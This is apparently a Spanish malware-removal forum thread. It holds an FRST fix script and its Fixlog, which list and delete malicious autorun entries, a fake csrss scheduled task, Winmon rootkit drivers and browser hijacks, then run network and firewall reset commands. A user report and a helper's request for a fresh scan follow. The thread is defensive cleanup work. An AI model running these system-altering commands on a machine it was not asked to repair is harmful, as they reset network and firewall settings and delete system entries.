HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [SZ3KV9NIQILVXI1] => "C:\Program Files\8QTX5BB3DR\8QTX5BB3D.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [HFMCGA4XKVDRDXC] => "C:\Program Files\8QTX5BB3DR\25A5XF0L8.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4803132] => "C:\Users\MrEidrian\AppData\Roaming\gesvmajhlfg\ynuzo1duzmd.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [2384361] => "C:\Users\MrEidrian\AppData\Roaming\0detggqes1g\qsfbixptrvg.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7G878VHBN6DN0JZ] => "C:\Program Files\SYKN90SQV7\SYKN90SQV.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [PRC3JU63KR51Q0K] => "C:\Program Files\ZLBV4QGTBO\ZLBV4QGTB.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [U1ZFNNPAKOAKRTK] => C:\Program Files\V96MUHOC2O\V96MUHOC2.exe [1241600 2019-09-14] (3TD8MEEK5) [File not signed]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [ETUGVQRVE0X929G] => "C:\Program Files\PONTMLEVX8\PONTMLEVX.exe"
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1139294] => "C:\Users\MrEidrian\AppData\Roaming\oqxiyvagkqg\ihxpu3f52tt.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8215114] => "C:\Users\MrEidrian\AppData\Roaming\ec1hfdjbtxq\ljnddtb4hhv.exe" /VERYSILENT
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [CloudNet] => C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-10-18] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\MountPoints2: {200c15f6-214d-11e9-92c2-6cf049e1b2f6} - H:\HiSuiteDownLoader.exe
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\MountPoints2: {a8264345-284c-11e9-ae89-6cf049e1b2f6} - I:\HiSuiteDownLoader.exe
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\MountPoints2: {ab69be00-e5c1-11e7-86a6-6cf049e1b2f6} - H:\HiSuiteDownLoader.exe
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Task: {0C18376E-CF1F-4DE5-9AB1-9A4AF3883FC0} - System32\Tasks\{33340A00-BC3E-4879-A6B1-0F8A69F911ED} => C:\Windows\system32\pcalua.exe -a "C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
Task: {84178B8E-D6FB-482F-8DB2-1BDCC2FB6E82} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {8F2ECB93-F014-417C-BDE5-9EFA963D7E95} - System32\Tasks\Microsoft\Windows\Time Synchronization\ViewUtcTime => C:\Users\MrEidrian\AppData\Roaming\\utctimer\\utc.exe
Task: {B5B8BC8D-597D-4885-A111-5B0AC028AD21} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4110848 2019-09-01] () [File not signed] <==== ATTENTION
Task: {D4B51A00-104D-48BC-9D4B-CF83A25366E5} - System32\Tasks\{2E3D2332-F591-4AC3-8C22-7B2CA38E767A} => C:\Windows\system32\pcalua.exe -a "C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
SearchScopes: HKLM-x32 -> DefaultScope value is missing
Toolbar: HKU\S-1-5-21-3862230028-3041123482-801023079-1000 -> No Name - {DB131C55-60C8-4ADC-84DC-9E76AB06E2DC} -  No File
Toolbar: HKU\S-1-5-21-3862230028-3041123482-801023079-1000 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
FF Homepage: Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344 -> hxxp://www.bing.com/?pc=COS2&ptag=D090119-N0300A5089E7D110BC46F293F&form=CONMHP&conlogo=CT3331990
FF NewTab: Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344 -> hxxp://www.bing.com/?pc=COS2&ptag=D090119-N0300A5089E7D110BC46F293F&form=CONMHP&conlogo=CT3331990
FF Extension: (Mozilla Official) - C:\Users\MrEidrian\AppData\Roaming\Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344\Extensions\{14553439-2741-4e9d-b474-784f336f58c9} [2019-09-14] [not signed]
FF SearchPlugin: C:\Users\MrEidrian\AppData\Roaming\Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344\searchplugins\bing-lavasoft-ff59.xml [2019-09-01]
CHR Extension: (book_helper) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\mihbhonnpblfklefmifmdampkldmloog [2019-09-01]
CHR Extension: (Chrome Media Router) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-09-01]
CHR HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [npiecjlhkngdinoeekmccdbjdgclmnbk] - C:\Users\MrEidrian\AppData\Local\CRE\npiecjlhkngdinoeekmccdbjdgclmnbk.crx [2012-08-26]
OPR Extension: (book_helper) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\mihbhonnpblfklefmifmdampkldmloog [2019-09-01]
OPR Extension: (SaveFrom.net helper) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\npdpplbicnmpoigidfdjadamgfkilaak [2019-09-01]
U2 YandexBrowserService; C:\Program Files (x86)\Yandex\YandexBrowser\19.7.2.455\service_update.exe [1596408 2019-08-01] (YANDEX LLC -> YANDEX LLC)
R1 ab6af3c5e932269c; C:\Windows\system32\drivers\ab6af3c5e932269c.sys [33984 2019-09-01] (BlockChain Advances Ltd -> FsFilter Network)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
U3 MBAMService; no ImagePath
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R1 WinmonProcessMonitor; \??\C:\Windows\System32\drivers\WinmonProcessMonitor.sys [X]
2019-10-18 11:59 - 2019-10-18 11:59 - 000000000 ____D C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc
2019-10-18 11:39 - 2019-10-18 11:39 - 000003192 _____ C:\Windows\system32\Tasks\csrss
AlternateDataStreams: C:\Windows:nlsPreferences [898]
AlternateDataStreams: C:\ProgramData\Microsoft:fJFUreezaO2K2ZYH3ywW6T3Dvbx [2608]
AlternateDataStreams: C:\ProgramData\Microsoft:IMOG7FwadszVkLuwNcFnh [2380]
AlternateDataStreams: C:\ProgramData\Microsoft:O0QN96UemdV4kzQFhIX [2430]
AlternateDataStreams: C:\ProgramData\TEMP:054203E4 [290]
AlternateDataStreams: C:\ProgramData\TEMP:1AAB2E68 [183]
AlternateDataStreams: C:\ProgramData\TEMP:4BF2F6B5 [388]
AlternateDataStreams: C:\Users\MrEidrian\AppData\Local\Archivos temporales de Internet:atSLiHJlFjQbclYyr5KCL0i [2340]
AlternateDataStreams: C:\Users\MrEidrian\AppData\Local\desktop.ini:3a96398c0f384e4adf5faa1736aeaf96 [802]
AlternateDataStreams: C:\Users\Public\.DS_Store:AFP_AfpInfo [122]
FirewallRules: [{6588581F-D0E5-45F4-AB84-B96E33632494}] => (Allow) C:\Users\MrEidrian\AppData\Local\Yandex\YandexBrowser\Application\browser.exe (YANDEX LLC -> YANDEX LLC)
FirewallRules: [{20B9F341-EE09-4598-8EF0-78107FD8A1CB}] => (Allow) C:\Windows\rss\csrss.exe () [File not signed]
FirewallRules: [{D474C89E-0BBC-49AB-8D44-BDC288633E71}] => (Allow) C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe (EpicNet Inc.) [File not signed]

HOSTS:
REMOVEPROXY:
EMPTYTEMP:
CMD: netsh winsock reset
CMD: ipconfig /renew
CMD: ipconfig /flushdns
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
END
*****************

Error: (0) Error al crear un punto de restauración.
Procesos cerrados correctamente.
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\SunJavaUpdateSched" => eliminado correctamente
"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\1nzirzyvrg3" => no encontrado
"HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\vw5wpldbi0c" => no encontrado
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\AdobeBridge" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\UM" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\HolyFeather" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\6945495" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\9439892" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\4ILMHV5EZ2V3JE9" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\7217898" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\O125LGFOY3G6T31" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\4743452" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\clakem" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\2142673" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\2086881" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\XMQCG00FHTCRTFT" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CVT2BE4AKKPQDC4" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\4182939" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\1924984" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\EG72O69XGR2NRI3" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\VQ3JCBJ32B3IDR3" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\7321231" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\9740042" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\FT2B7Y4X2D4BTIN" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\OHM9UGYB0NI0O8G" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\U1H8A5MXG7UKM4N" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\1707178" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\8727207" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\N4V1FFCWTT3R47M" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\6836345" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\6780553" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\1VDIM44SM0XTGBH" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\5K8RSKT0FRWD1U1" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\8013299" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\2CDZK6WEL344Q5F" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\5098959" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\D1RO0EW4268PN6X" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\492184" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\2963468" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\SZ3KV9NIQILVXI1" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\HFMCGA4XKVDRDXC" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\4803132" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\2384361" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\7G878VHBN6DN0JZ" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PRC3JU63KR51Q0K" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\U1ZFNNPAKOAKRTK" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\ETUGVQRVE0X929G" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\1139294" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\8215114" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => eliminado correctamente
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{200c15f6-214d-11e9-92c2-6cf049e1b2f6} => eliminado correctamente
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a8264345-284c-11e9-ae89-6cf049e1b2f6} => eliminado correctamente
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{ab69be00-e5c1-11e7-86a6-6cf049e1b2f6} => eliminado correctamente
HKLM\SOFTWARE\Policies\Google => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0C18376E-CF1F-4DE5-9AB1-9A4AF3883FC0}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0C18376E-CF1F-4DE5-9AB1-9A4AF3883FC0}" => eliminado correctamente
C:\Windows\System32\Tasks\{33340A00-BC3E-4879-A6B1-0F8A69F911ED} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{33340A00-BC3E-4879-A6B1-0F8A69F911ED}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{84178B8E-D6FB-482F-8DB2-1BDCC2FB6E82}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{84178B8E-D6FB-482F-8DB2-1BDCC2FB6E82}" => eliminado correctamente
C:\Windows\System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8F2ECB93-F014-417C-BDE5-9EFA963D7E95}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8F2ECB93-F014-417C-BDE5-9EFA963D7E95}" => eliminado correctamente
C:\Windows\System32\Tasks\Microsoft\Windows\Time Synchronization\ViewUtcTime => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Time Synchronization\ViewUtcTime" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{B5B8BC8D-597D-4885-A111-5B0AC028AD21}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B5B8BC8D-597D-4885-A111-5B0AC028AD21}" => eliminado correctamente
C:\Windows\System32\Tasks\csrss => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D4B51A00-104D-48BC-9D4B-CF83A25366E5}" => eliminado correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D4B51A00-104D-48BC-9D4B-CF83A25366E5}" => eliminado correctamente
C:\Windows\System32\Tasks\{2E3D2332-F591-4AC3-8C22-7B2CA38E767A} => movido correctamente
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{2E3D2332-F591-4AC3-8C22-7B2CA38E767A}" => eliminado correctamente
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => valor restaurado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{DB131C55-60C8-4ADC-84DC-9E76AB06E2DC}" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{47833539-D0C5-4125-9FA8-0819E2EAAC93}" => eliminado correctamente
"FF Homepage: Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344 -> hxxp://www.bing.com/?pc=COS2&ptag=D090119-N0300A5089E7D110BC46F293F&form=CONMHP&conlogo=CT3331990" => no encontrado
"Firefox newtab" => eliminado correctamente
C:\Users\MrEidrian\AppData\Roaming\Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344\Extensions\{14553439-2741-4e9d-b474-784f336f58c9} => movido correctamente
"C:\Users\MrEidrian\AppData\Roaming\Mozilla\Firefox\Profiles\0uh69wgl.default-1567320513344\searchplugins\bing-lavasoft-ff59.xml" => no encontrado
CHR Extension: (book_helper) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\mihbhonnpblfklefmifmdampkldmloog [2019-09-01] => Error: Ninguna corrección automática encontrada para esta entrada.
CHR Extension: (Chrome Media Router) - C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-09-01] => Error: Ninguna corrección automática encontrada para esta entrada.
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Google\Chrome\Extensions\2012-08-26 => no encontrado
C:\Users\MrEidrian\AppData\Local\CRE\npiecjlhkngdinoeekmccdbjdgclmnbk.crx => movido correctamente
OPR Extension: (book_helper) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\mihbhonnpblfklefmifmdampkldmloog [2019-09-01] => Error: Ninguna corrección automática encontrada para esta entrada.
OPR Extension: (SaveFrom.net helper) - C:\Users\MrEidrian\AppData\Roaming\Opera Software\Opera Stable\Extensions\npdpplbicnmpoigidfdjadamgfkilaak [2019-09-01] => Error: Ninguna corrección automática encontrada para esta entrada.
HKLM\System\CurrentControlSet\Services\YandexBrowserService => eliminado correctamente
YandexBrowserService => servicio eliminado correctamente
ab6af3c5e932269c => No se puede detener el servicio.
HKLM\System\CurrentControlSet\Services\ab6af3c5e932269c => no pudo ser eliminado, clave podría estar protegida
Winmon => No se puede detener el servicio.
HKLM\System\CurrentControlSet\Services\Winmon => eliminado correctamente
Winmon => servicio eliminado correctamente
WinmonFS => No se puede detener el servicio.
HKLM\System\CurrentControlSet\Services\WinmonFS => eliminado correctamente
WinmonFS => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\MBAMService => eliminado correctamente
MBAMService => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\Synth3dVsc => eliminado correctamente
Synth3dVsc => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\tsusbhub => eliminado correctamente
tsusbhub => servicio eliminado correctamente
HKLM\System\CurrentControlSet\Services\VGPU => eliminado correctamente
VGPU => servicio eliminado correctamente
WinmonProcessMonitor => No se puede detener el servicio.
HKLM\System\CurrentControlSet\Services\WinmonProcessMonitor => eliminado correctamente
WinmonProcessMonitor => servicio eliminado correctamente
C:\Users\MrEidrian\AppData\Roaming\EpicNet Inc => movido correctamente
"C:\Windows\system32\Tasks\csrss" => no encontrado
C:\Windows => ":nlsPreferences" ADS eliminado correctamente
C:\ProgramData\Microsoft => ":fJFUreezaO2K2ZYH3ywW6T3Dvbx" ADS eliminado correctamente
C:\ProgramData\Microsoft => ":IMOG7FwadszVkLuwNcFnh" ADS eliminado correctamente
C:\ProgramData\Microsoft => ":O0QN96UemdV4kzQFhIX" ADS eliminado correctamente
C:\ProgramData\TEMP => ":054203E4" ADS eliminado correctamente
C:\ProgramData\TEMP => ":1AAB2E68" ADS eliminado correctamente
C:\ProgramData\TEMP => ":4BF2F6B5" ADS eliminado correctamente
C:\Users\MrEidrian\AppData\Local\Archivos temporales de Internet => ":atSLiHJlFjQbclYyr5KCL0i" ADS eliminado correctamente
C:\Users\MrEidrian\AppData\Local\desktop.ini => ":3a96398c0f384e4adf5faa1736aeaf96" ADS eliminado correctamente
C:\Users\Public\.DS_Store => ":AFP_AfpInfo" ADS eliminado correctamente
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{6588581F-D0E5-45F4-AB84-B96E33632494}" => eliminado correctamente
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{20B9F341-EE09-4598-8EF0-78107FD8A1CB}" => eliminado correctamente
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D474C89E-0BBC-49AB-8D44-BDC288633E71}" => eliminado correctamente
C:\Windows\System32\Drivers\etc\hosts => movido correctamente
Hosts restaurado correctamente.

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente
"HKU\S-1-5-21-3862230028-3041123482-801023079-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente


========= Final 1 RemoveProxy: =========


========= netsh winsock reset =========


El cat logo Winsock se restableci¢ correctamente.
Debe reiniciar el equipo para completar el restablecimiento.


========= Final 1 CMD: =========


========= ipconfig /renew =========


Configuraci¢n IP de Windows


Adaptador de Ethernet Conexi¢n de  rea local:

   Sufijo DNS espec¡fico para la conexi¢n. . : 
   Direcci¢n IPv4. . . . . . . . . . . . . . : 192.168.0.30
   M scara de subred . . . . . . . . . . . . : 255.255.255.0
   Puerta de enlace predeterminada . . . . . : 192.168.0.1

Adaptador de t£nel Teredo Tunneling Pseudo-Interface:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS espec¡fico para la conexi¢n. . : 

Adaptador de t£nel isatap.{DD68EF26-7605-461E-89EA-F338900C8CF6}:

   Estado de los medios. . . . . . . . . . . : medios desconectados
   Sufijo DNS espec¡fico para la conexi¢n. . : 

========= Final 1 CMD: =========


========= ipconfig /flushdns =========


Configuraci¢n IP de Windows

Se vaci¢ correctamente la cach‚ de resoluci¢n de DNS.

========= Final 1 CMD: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.5.7601 ]
BITS administration utility.
(C) Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

0 out of 0 jobs canceled.

========= Final 1 CMD: =========


========= netsh advfirewall reset =========

Aceptar


========= Final 1 CMD: =========


========= netsh advfirewall set allprofiles state ON =========

Aceptar


========= Final 1 CMD: =========


========= netsh int ipv4 reset =========

Global se restableci¢ correctamente.
Interfaz se restableci¢ correctamente.
Reinicie el equipo para completar esta acci¢n.


========= Final 1 CMD: =========


========= netsh int ipv6 reset =========

Interfaz se restableci¢ correctamente.
Reinicie el equipo para completar esta acci¢n.


========= Final 1 CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 21267260 B
Java, Flash, Steam htmlcache => 31661088 B
Windows/system/drivers => 13646089 B
Edge => 0 B
Chrome => 61419742 B
Firefox => 111090728 B
Opera => 16090735 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 135838 B
systemprofile32 => 202066 B
LocalService => 334310 B
NetworkService => 400538 B
MrEidrian => 1012679795 B
BaNwOrD => 1012679795 B
Noelia => 1114502754 B

RecycleBin => 28248027 B
EmptyTemp: => 3.2 GB datos temporales eliminados.

================================

Resultado de los archivos programados para mover (Modo de Inicio: Normal) (Fecha y Hora: 17-01-2020 11:52:05)


Resultado de las claves programadas para eliminar después de reiniciar:

HKLM\System\CurrentControlSet\Services\ab6af3c5e932269c => no pudo ser eliminado, clave podría estar protegida

==== Final  Fixlog 11:52:05 ====

Creo que sigue igual, se abre el chrome con muchas ventanas, Aunque las apps si que no salen arrancandose

13

Hola

Vas a volver a analizar con Frst como te indiqué aquí, después de 3 meses, si has andado con el PC, puede haya modificaciones.

Trae los reportes.

Un saludo

14

Hola, no. No uso el ordenador. Uso móviles o el portátil. Pero con el curro y eso me cuesta ponerme. Ahora lo subo Me ha salido una ventana que pone Firefox pass y contraseñas guardadas.

15 
Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x64) Versión: 27-01-2020
Ejecutado por MrEidrian (administrador) sobre BANWORD (Gigabyte Technology Co., Ltd. P55A-UD4) (31-01-2020 11:11:03)
Ejecutado desde C:\Users\MrEidrian\Desktop
Perfiles cargados: MrEidrian (Perfiles disponibles: MrEidrian & Noelia)
